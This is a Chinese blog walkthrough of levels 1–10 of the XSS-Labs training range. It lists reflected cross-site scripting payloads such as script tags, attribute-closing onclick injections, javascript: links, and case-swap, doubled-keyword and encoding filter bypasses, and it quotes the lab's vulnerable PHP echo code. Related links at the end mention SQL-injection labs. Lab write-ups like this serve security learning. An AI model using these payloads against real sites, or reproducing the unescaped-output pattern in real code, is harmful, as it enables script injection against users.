XSSLabs Less1-10

于 2022-08-01 19:13:42 发布
阅读量922 收藏 1
点赞数
分类专栏: XSSLabs 文章标签: servlet java html 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/126107238
版权
本文介绍了XSS实验室的一系列挑战,包括常规的XSS注入,HTML属性闭合,事件处理程序利用,过滤与绕过策略等。通过这些练习,读者可以深入理解XSS攻击原理,并学习如何防止此类安全漏洞。挑战涉及了如htmlspecialchars()函数的使用,onclick事件,HTML属性的双写等防御手段的绕过。
摘要由CSDN通过智能技术生成

Xsslabs下载地址:

https://github.com/do0dl3/xss-labs

Less-1--常规插入语句

 

把test的值改成跨站脚本语句即可name=<script>alert(1)</script>

 Less-2--”>闭合前面的语句

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level2.php method=GET>

<input name=keyword  value="'.$str.'">

<input type=submit name=submit value="搜索"/>

</form>

</center>';

?>

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体

&(和号) 成为&

" (双引号) 成为 "

' (单引号) 成为 '

< (小于) 成为 <

> (大于) 成为 >

同样在keyword后插入语句<script>alert(1)</script>

 选中<script>alert(1)</script>右键查看元素,发现两个语句

 使用”>闭合前面的语句

在keyword修改js语句为 “><script>alert(1)</script>

 

Less-3----HTML onclick 事件

采取第二关做法,点击发现单引号引用

 

 改为’发现过滤

 

同样在from表单中 ,鼠标点击搜索按钮可以触发HTML onclick 事件属性

当单击鼠标时运行脚本:<button οnclick="copyText()">复制文本</button>

 闭合前后两边的单引号,构造payload:  ‘ οnclick=alert(1) ‘  

 

Less-4--闭合引号

与第三关相同,闭合掉两边双引号就可以了

payload: " οnclick="alert(1)" "

Less-5--超链接

采用第四关做法发现onclick变成o_nclick

 过滤代码如下:

$str2=str_replace("<script","<scr_ipt",$str);

$str3=str_replace("on","o_n",$str2);

方法一:去掉_

 方法二:采用超链接

 payload: "><a href=javascript:alert(1)>yy</a>

 点击yy成功

Less-6--大小写绕过

方法一:使用第四关语句" οnclick=alert(1) "发现

 直接点击修改,简单粗暴,但只能本次有效,实战意义不大

方法二:大小写绕过

过滤代码:

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

点击事件payload:  " ONclick=alert(1) "

超链接payload: "><a HRef=javasCript:alert(1)>yy</a>

Less-7--双写href,script关键字

 将href过滤为空,script过滤为空

过滤代码: srt_replace为一次过滤

方法:双写href,script

payload:  "><a hhrefref=javascscriptript:alert(1)>yy</a>

点击yy按钮成功

Less-8----javascript文本转换

添加链接只需输入href即可,输入javascript:alert(1)

得到

 利用supersoft进行文本转换

payload: javascript:alert(1) (需要文本编码)

Less-9----注释http://

使用8的解码看到

 过滤代码 必须有http:// 否则过滤

 http前的//是为了注释掉http://

payload: javascript:alert(1)//http://       (需要文本编码)

Less-10--多标签突破

这里有三个 <input> 标签隐藏,也就意味着是三个参数看看哪一个标签能够被突破

payload: &t_sort="type="text" οnclick="alert(1)"

t_sort              为参数

type="text"         为添加点击类型为text

οnclick="alert(1)"  为鼠标点击事件

通过构造参数响应发现只有t_sort里面的值被改变了。因此可以从该标签进行突破

 

 

xiao飞仔
关注
专栏目录
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5502
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
安装less less-loader报错
qq_51470342的博客
05-09 996
报错信息: Failed to compile with 1 errors Module build failed: TypeError: loaderContext.getResolve is not a function 可能是less-loader安装版本太高 卸载重新装 npm uninstall less-loader npm install less less-loader@5.0.0 -D 如果继续报错,可以尝试删除项目中的node-modules再重新安装 npm install 再安
xss-labs.zip
06-25
xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs
Yb_140的博客
03-26 1843
xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 level1 猜测使用GET传参,将name显示在
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
前端开源库-less-modify-var-loader
08-30
"less-modify-var-loader"就是一个专为前端开发者设计的开源库,它主要用于处理Less预处理器中的变量,特别是在使用Webpack构建项目时,能够方便地替换Less文件中的变量值。 Less是一种CSS预处理器,它允许我们使用...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
supersoft加解密工具
07-24
supersoft加解密工具
超级加解密转换工具SuperSoft
11-07
超级加解密转换工具SuperSoft
2021-01-11-xss-labs下
qq_50963064的博客
11-15 439
xss-labs 11~20 level-11 同第十关一样,页面上只有一个显示位,再看看源码: 可以看到有隐藏表单,比第十关多了一个t_ref的<input>标签。 而且t_ref的value值为上一关的地址链接值。那么我们可以通过抓包修改这个值来攻击,将referer内容修改为: " type="text" onclick="alert(1) 成功插入,然后触发即可: 看源码: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2XjJlf1w-16369
XSS-Labs合集
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
08-02 2023
Level 1 Level 2 Level 3 Level 4 Level 5 Level 6 Level 7 Level 8 Level 9 Level 10 Level 11 Level 12 Level 13 Level 16 Level 17 Level 18
XSS-labs
Mccc_li的博客
04-09 1085
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss-labs笔记(一)
baidu_39504221的博客
12-18 229
明天考试啦,先做个靶场压压惊:v xsslabs的靶场好像挂了(csdn提供的下载居然要几十C币,啊这) 给个网盘吧https://cloud.189.cn/t/YjMZ7bVb2QFr 靶场解压直接放到phpstudy的根目录下就行了 文章目录level1level2level3level4level5 level1 url上有个参数,直接<script>alert(1)</script>试下 直接弹窗,nice 看看源码 $str = $_GET["name"]; echo
sqli-labs less-1
最新发布
08-07
"Less-1"的目标可能是让你了解如何构造精心设计的SQL语句,它们既能利用系统提供的漏洞,又能避开简单的过滤规则,获取数据库中的信息。它旨在提升防御者对SQL注入攻击的认识,并教授基本的渗透测试技巧。 要完成这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值